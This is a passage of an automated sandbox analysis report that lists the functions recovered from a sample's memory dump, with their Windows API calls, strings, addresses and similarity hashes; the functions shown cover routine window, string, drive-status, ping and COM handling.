GetDlgItem.USER32(?,00000001), ref: 0101ED1E
GetWindowRect.USER32(00000000,?), ref: 0101ED30
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0101ED8E
GetDlgItem.USER32(?,00000002), ref: 0101ED99
GetWindowRect.USER32(00000000,?), ref: 0101EDAB
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0101EE01
GetDlgItem.USER32(?,000003E9), ref: 0101EE0F
GetWindowRect.USER32(00000000,?), ref: 0101EE20
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0101EE63
GetDlgItem.USER32(?,000003EA), ref: 0101EE71
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0101EE8E
InvalidateRect.USER32(?,00000000,00000001), ref: 0101EE9B

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 834a758bb5cb84798c3a1ed3183c949555f92ebcfbc0bc0c06bd878a0ab7289e
Instruction ID: 9ba669acdf3db660c7335c0362d52a87bc0c9402af6285367161bfc5ed84fda8
Opcode Fuzzy Hash: 834a758bb5cb84798c3a1ed3183c949555f92ebcfbc0bc0c06bd878a0ab7289e
Instruction Fuzzy Hash: CE512F71B00205AFDB18DFADCD85AAEBBFAFB88700F148169F95AD7294D7759D008B10

Function 00FFB73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00FFB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FFB759,?,00000000,?,?,?,?,00FFB72B,00000000,?), ref: 00FFBA58

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00FFB72B), ref: 00FFB7F6
KillTimer.USER32(00000000,?,00000000,?,?,?,?,00FFB72B,00000000,?,?,00FFB2EF,?,?), ref: 00FFB88D
DestroyAcceleratorTable.USER32(00000000), ref: 0105D8A6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FFB72B,00000000,?,?,00FFB2EF,?,?), ref: 0105D8D7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FFB72B,00000000,?,?,00FFB2EF,?,?), ref: 0105D8EE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FFB72B,00000000,?,?,00FFB2EF,?,?), ref: 0105D90A
DeleteObject.GDI32(00000000), ref: 0105D91C

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: baadffd600f44c885f09b51f12e2f9abf3535ca0ac83100083197e5bc86505b1
Instruction ID: a817ec5c5a02cce5dbcb42130015f361bda7deb00e942b4c6c62ee4724b571ef
Opcode Fuzzy Hash: baadffd600f44c885f09b51f12e2f9abf3535ca0ac83100083197e5bc86505b1
Instruction Fuzzy Hash: DB61AE32500A05DFDB769F58D988B36B7F5FF88362F14051EE6C686A74C779A880EB40

Function 00FFB40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON

Download Yara Rule

APIs

Part of subcall function 00FFB526: GetWindowLongW.USER32(?,000000EB), ref: 00FFB537

GetSysColor.USER32(0000000F), ref: 00FFB438

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 5c42a90aecfcbc456de2d03e6b686be11a054ff5cb94bde453a230f567284dca
Instruction ID: 1a384acf564243d06cc4813d15beeb149673311dce17dc8832bb429b33e39b75
Opcode Fuzzy Hash: 5c42a90aecfcbc456de2d03e6b686be11a054ff5cb94bde453a230f567284dca
Instruction Fuzzy Hash: 5C41C331500108AFDB21AF68D989BB93B65AF05730F1842A1FEE58E1FAD7758C41EB21

Function 0102690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 01026923
_wcscpy.LIBCMT ref: 01026934
__wsplitpath.LIBCMT ref: 01026958
__wsplitpath.LIBCMT ref: 01026979
_wcscpy.LIBCMT ref: 0102699B
_wcscpy.LIBCMT ref: 010269B9
_wcscpy.LIBCMT ref: 010269C7
_wcscat.LIBCMT ref: 010269D6
_wcscat.LIBCMT ref: 01026A2B
_wcscat.LIBCMT ref: 01026A61
_wcscat.LIBCMT ref: 01026A73

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
String ID:
API String ID: 136442275-0
Opcode ID: be9e036714727c84353b776e6867c08993a7663b942bce9b196ef70759865a62
Instruction ID: 88c56efa91e51b78e0e871b4ef818b930d589b2d7438a23395216b6e5eeeada8
Opcode Fuzzy Hash: be9e036714727c84353b776e6867c08993a7663b942bce9b196ef70759865a62
Instruction Fuzzy Hash: 90414F7684522DAEDF66EB94CC45DDF73BDEB54200F0040E7FA89A2084EA31A7E58F50

Function 0102D76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(0107DC00,0107DC00,0107DC00), ref: 0102D7CE
GetDriveTypeW.KERNEL32(?,01093A70,00000061), ref: 0102D898
_wcscpy.LIBCMT ref: 0102D8C2

Strings

fixed, xrefs: 0102D816
ramdisk, xrefs: 0102D842
network, xrefs: 0102D82C
all, xrefs: 0102D7D4
cdrom, xrefs: 0102D7EA
removable, xrefs: 0102D800
unknown, xrefs: 0102D859

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: b617e6349317cc397f24f0b755477aa50ba65944724bdbfe54f06032992856a0
Instruction ID: 45d7902e502e788536135a512c5eeea558e2b826821d9b3b2b4e661e994d48b4
Opcode Fuzzy Hash: b617e6349317cc397f24f0b755477aa50ba65944724bdbfe54f06032992856a0
Instruction Fuzzy Hash: 4B51DE30508244AFD700EF54DC91AAEB7A5FF80314F10882DFADA5B2A2EBB5DD05DB42

Function 00FE936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00FE93AB
__itow.LIBCMT ref: 00FE93DF

Part of subcall function 01001557: _xtow@16.LIBCMT ref: 01001578

Strings

0x%p, xrefs: 01054CAD
False, xrefs: 01054C93
True, xrefs: 01054C8C
%.15g, xrefs: 00FE93A5

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: __itow__swprintf_xtow@16
String ID: %.15g$0x%p$False$True
API String ID: 1502193981-2263619337
Opcode ID: b143711153294c6cefb059134d1adee90b7f44ce49d1b618630bf9f76b3b2ac9
Instruction ID: 41f7a73cffd8bc6f8fe01d44a2d9993608d574acd800d1ea4161b85742655649
Opcode Fuzzy Hash: b143711153294c6cefb059134d1adee90b7f44ce49d1b618630bf9f76b3b2ac9
Instruction Fuzzy Hash: 8341E5725042099FEB64DF39D941FAAB7E8EF44300F2444AEE58ADB1C1EA719941DB60

Function 0104A1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0104A259
CreateCompatibleDC.GDI32(00000000), ref: 0104A260
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0104A273
SelectObject.GDI32(00000000,00000000), ref: 0104A27B
GetPixel.GDI32(00000000,00000000,00000000), ref: 0104A286
DeleteDC.GDI32(00000000), ref: 0104A28F
GetWindowLongW.USER32(?,000000EC), ref: 0104A299
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0104A2AD
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0104A2B9

Strings

static, xrefs: 0104A1F1

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 5aaf74bede3eefe25293fd23b44ccf130dbf07fa6399b5f76a01db89835d263c
Instruction ID: f1c29963df9399bd92669b12e7cff834f0086ad39ecaa621880f45427b7716f2
Opcode Fuzzy Hash: 5aaf74bede3eefe25293fd23b44ccf130dbf07fa6399b5f76a01db89835d263c
Instruction Fuzzy Hash: 76316071241115FBDF215FA8DD49FDA3BA9FF0D360F100224FA95A60A0C77AD811EB64

Function 01026F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 01026F1D
gethostname.WSOCK32(?,00000100), ref: 01026F37
gethostbyname.WSOCK32(?), ref: 01026F44
_wcscpy.LIBCMT ref: 01026F6C
inet_ntoa.WSOCK32(?), ref: 01026F8A
_strcat.LIBCMT ref: 01026F98
_wcscpy.LIBCMT ref: 01026FAF
WSACleanup.WSOCK32 ref: 01026FBD
_wcscpy.LIBCMT ref: 01026FCB

Strings

0.0.0.0, xrefs: 01026F66

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 2620052-3771769585
Opcode ID: 9d8ab78127498d789d6d7564626f1ec3e1bafd0eeaf356e49e1fa60927bacfb0
Instruction ID: c0d1c7e6f0984eea109a291ebd4a4fba13b2876fe5f83dc989b1953322292912
Opcode Fuzzy Hash: 9d8ab78127498d789d6d7564626f1ec3e1bafd0eeaf356e49e1fa60927bacfb0
Instruction Fuzzy Hash: E3113A31604129AFDF65AB74DC49EDE77ACEF10710F4400A6F5C5A6090FF7ADA848B61

Function 0100500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 01005047

Part of subcall function 01007C0E: __getptd_noexit.LIBCMT ref: 01007C0E

__gmtime64_s.LIBCMT ref: 010050E0
__gmtime64_s.LIBCMT ref: 01005116
__gmtime64_s.LIBCMT ref: 01005133
__allrem.LIBCMT ref: 01005189
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010051A5
__allrem.LIBCMT ref: 010051BC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010051DA
__allrem.LIBCMT ref: 010051F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0100520F
__invoke_watson.LIBCMT ref: 01005280

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction ID: 5139d924f25d021c3276f90b104a12aa35211eecb5d80f06b39bfc5ec8cecb3d
Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction Fuzzy Hash: 2171B072A00717ABFB16EA78CC40BAAB7E9AF15664F144269F590D62C0E774DA408BD0

Function 01024DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 01024DF8
GetMenuItemInfoW.USER32(010A1708,000000FF,00000000,00000030), ref: 01024E59
SetMenuItemInfoW.USER32(010A1708,00000004,00000000,00000030), ref: 01024E8F
Sleep.KERNEL32(000001F4), ref: 01024EA1
GetMenuItemCount.USER32(?), ref: 01024EE5
GetMenuItemID.USER32(?,00000000), ref: 01024F01
GetMenuItemID.USER32(?,-00000001), ref: 01024F2B
GetMenuItemID.USER32(?,?), ref: 01024F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 01024FB6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01024FCA
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01024FEB

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: cd48b16ac215f9bc6a62f086fb09f469d38f1e10161417a16a05fbdf18aee95c
Instruction ID: 5b339d5a847a497ed9f598194e17dcea408031ff04beb3117ddfbc94a133879c
Opcode Fuzzy Hash: cd48b16ac215f9bc6a62f086fb09f469d38f1e10161417a16a05fbdf18aee95c
Instruction Fuzzy Hash: 50619171A00269AFEF61CFA8D888EAE7BF8EB45304F040199F5C5E7291D775A904CB20

Function 01049C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 01049C98
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 01049C9B
GetWindowLongW.USER32(?,000000F0), ref: 01049CBF
_memset.LIBCMT ref: 01049CD0
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01049CE2
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 01049D5A

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 762e50b11b82acf37ac9489499116c3cf8cfcf2479fcfdbeab437acbd56be4c0
Instruction ID: ef951cb80ce802eb32756b654f959724cec338ac4a0658dae02ee0d731639ac6
Opcode Fuzzy Hash: 762e50b11b82acf37ac9489499116c3cf8cfcf2479fcfdbeab437acbd56be4c0
Instruction Fuzzy Hash: 48618CB5900208AFDB21DFA8CC81EEE77B8EF0D704F1441AAFA95E7291D774A941DB50

Function 010194E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 010194FE
SafeArrayAllocData.OLEAUT32(?), ref: 01019549
VariantInit.OLEAUT32(?), ref: 0101955B
SafeArrayAccessData.OLEAUT32(?,?), ref: 0101957B
VariantCopy.OLEAUT32(?,?), ref: 010195BE
SafeArrayUnaccessData.OLEAUT32(?), ref: 010195D2
VariantClear.OLEAUT32(?), ref: 010195E7
SafeArrayDestroyData.OLEAUT32(?), ref: 010195F4
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 010195FD
VariantClear.OLEAUT32(?), ref: 0101960F
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0101961A

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 5fac626d6dada3968b57acdeee0e8ad8d76377aaddebfbec79e5453da77523e7
Instruction ID: 426c97599a8856b569d0cec5d7733a3b0cbcb74e7beaeb6761fcd56499b8fc13
Opcode Fuzzy Hash: 5fac626d6dada3968b57acdeee0e8ad8d76377aaddebfbec79e5453da77523e7
Instruction Fuzzy Hash: 0B414131A00219AFCB11DFE4D8549EEBFB9FF08354F008465E582A3264DF79EA45CBA0

Function 0103ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00FE936C: __swprintf.LIBCMT ref: 00FE93AB
Part of subcall function 00FE936C: __itow.LIBCMT ref: 00FE93DF

CoInitialize.OLE32 ref: 0103ADF6
CoUninitialize.OLE32 ref: 0103AE01
CoCreateInstance.OLE32(?,00000000,00000017,0106D8FC,?), ref: 0103AE61
IIDFromString.OLE32(?,?), ref: 0103AED4
VariantInit.OLEAUT32(?), ref: 0103AF6E
VariantClear.OLEAUT32(?), ref: 0103AFCF

Strings

Failed to create object, xrefs: 0103AE6C, 0103AF22
Invalid parameter, xrefs: 0103AEED
NULL Pointer assignment, xrefs: 0103AEA6

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 5e6138ebc0c7d5e4171c98b90e6da9cb4415cfce3ab90e9a1ed4788b9a7418eb
Instruction ID: e0e0547077454fd6f6f6ed6f4b20dae7431e81c02817a7d9f6d7335b235f04b5
Opcode Fuzzy Hash: 5e6138ebc0c7d5e4171c98b90e6da9cb4415cfce3ab90e9a1ed4788b9a7418eb
Instruction Fuzzy Hash: A5615671308311EFD721DF95C848B6ABBE8AF89714F004859F9C5DB2A1C775E948CBA2

Function 01038107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 01038168
inet_addr.WSOCK32(?,?,?), ref: 010381AD
gethostbyname.WSOCK32(?), ref: 010381B9
IcmpCreateFile.IPHLPAPI ref: 010381C7
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 01038237
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0103824D
IcmpCloseHandle.IPHLPAPI(00000000), ref: 010382C2
WSACleanup.WSOCK32 ref: 010382C8

Strings

Ping, xrefs: 010381EB

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: d2398a656aaaf80021d163b919e40dcc70b4427bced2d9ed9bbcdfc295552e19
Instruction ID: 05a1dac7f85b5295065fb82a66d5ae319c25eb243dc1642968de97c428a1d767
Opcode Fuzzy Hash: d2398a656aaaf80021d163b919e40dcc70b4427bced2d9ed9bbcdfc295552e19
Instruction Fuzzy Hash: E95183316047019FD7619F64DC45B2EBBE8BF84710F04899AFAD5DB2A1DB74E900CB42

Function 0102E389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0102E396
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0102E40C
GetLastError.KERNEL32 ref: 0102E416
SetErrorMode.KERNEL32(00000000,READY), ref: 0102E483

Strings

NOTREADY, xrefs: 0102E442
READONLY, xrefs: 0102E44E
READY, xrefs: 0102E45C
UNKNOWN, xrefs: 0102E43B
INVALID, xrefs: 0102E455

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 4a90adb673b83f72dd44d3a9bebc6461be6d772a51dd25920c2862eed9ae8500
Instruction ID: dd846d6b3eec9d79ef432c76bae05cc4f0eebd8fe85ae1a29644ba062fd8514f
Opcode Fuzzy Hash: 4a90adb673b83f72dd44d3a9bebc6461be6d772a51dd25920c2862eed9ae8500
